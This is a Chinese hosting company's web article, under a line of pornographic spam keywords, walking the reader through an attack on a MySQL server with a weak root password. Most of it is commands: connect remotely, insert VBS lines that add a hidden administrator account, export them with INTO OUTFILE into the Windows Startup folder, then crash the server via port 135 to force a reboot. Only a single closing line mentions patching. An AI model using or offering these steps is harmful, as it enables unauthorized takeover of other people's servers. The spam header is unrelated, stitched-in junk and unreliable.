亚洲韩日午夜视频,欧美日韩在线精品一区二区三区,韩国超清无码一区二区三区,亚洲国产成人影院播放,久草新在线,在线看片AV色

您好,歡迎來到思海網絡,我們將竭誠為您提供優質的服務! 誠征網絡推廣 | 網站備案 | 幫助中心 | 軟件下載 | 購買流程 | 付款方式 | 聯系我們 [ 會員登錄/注冊 ]
促銷推廣
客服中心
業務咨詢
有事點擊這里…  531199185
有事點擊這里…  61352289
點擊這里給我發消息  81721488
有事點擊這里…  376585780
有事點擊這里…  872642803
有事點擊這里…  459248018
有事點擊這里…  61352288
有事點擊這里…  380791050
技術支持
有事點擊這里…  714236853
有事點擊這里…  719304487
有事點擊這里…  1208894568
有事點擊這里…  61352289
在線客服
有事點擊這里…  531199185
有事點擊這里…  61352288
有事點擊這里…  983054746
有事點擊這里…  893984210
當前位置:首頁 >> 技術文章 >> 文章瀏覽
技術文章

MYSQL用戶root密碼為弱口令的攻擊

添加時間:2014-11-12 2:23:14  添加: 思海網絡 
1、連接到對方MYSQL 服務器

  mysql -u root -h 192.168.0.1

  mysql.exe 這個程序在你安裝了MYSQL的的BIN目錄中   

  2、讓我們來看看服務器中有些什么數據庫

  mysql>show databases;

  MYSQL默認安裝時會有MYSQL、TEST這兩個數據庫,如果你看到有其它的數據庫那么就是用戶自建的數據庫。   

  3、讓我們進入數據庫

  mysql>use test;

  我們將會進入test數據庫中   

  4、查看我們進入數據庫中有些什么數據表

  mysql>show tables;

  默認的情況下,test中沒有任何表的存在。

  以下為關鍵的部分   

  5、在TEST數據庫下創建一個新的表;

  mysql>create table a (cmd text);

  好了,我們創建了一個新的表,表名為a,表中只存放一個字段,字段名為cmd,為text文本。   

  6、在表中插入內容

  mysql>insert into a values ("set wshshell=createobject (""w.shell"" ) " );

  mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1/add"",0) " );

  mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 1 /add"",0) " );

  注意雙引號和括號以及后面的"0"一定要輸入!我們將用這三條命令來建立一個VBS的腳本程序!   

  7、好了,現在我們來看看表a中有些什么

  mysql>select * from a;

  我們將會看到表中有三行數據,就是我們剛剛輸入的內容,確認你輸入的內容無誤后,我們來到下一步   

  8、輸出表為一個VBS的腳本文件

  mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\「開始」菜單\\程序\\啟動\\a.vbs";

  我們把我們表中的內容輸入到啟動組中,是一個VBS的腳本文件!注意"\"符號。   

  9、看到這大家肯定知道了,就是利用MYSQL輸出一個可執行的文件而已。為什么不用BAT呢,因為啟動運行時會有明顯的DOS窗口出來,而用VBS腳本則可以完全隱藏窗口且不會有錯誤提示!本來,應該還有一句完成腳本后自動刪除此腳本的,但是中文目錄實在無法處理,只有作罷!好了,找個工具攻擊135讓服務器重啟吧,幾分鐘以后你就是管理員了,為了服務器的安全及時打好補丁,禁止VBS腳本

關鍵字:MYSQL、服務器、數據庫

分享到:

頂部 】 【 關閉
版權所有:佛山思海電腦網絡有限公司 ©1998-2024 All Rights Reserved.
聯系電話:(0757)22630313、22633833
中華人民共和國增值電信業務經營許可證: 粵B1.B2-20030321 備案號:粵B2-20030321-1
網站公安備案編號:44060602000007 交互式欄目專項備案編號:200303DD003  
察察 工商 網安 舉報有獎  警警  手機打開網站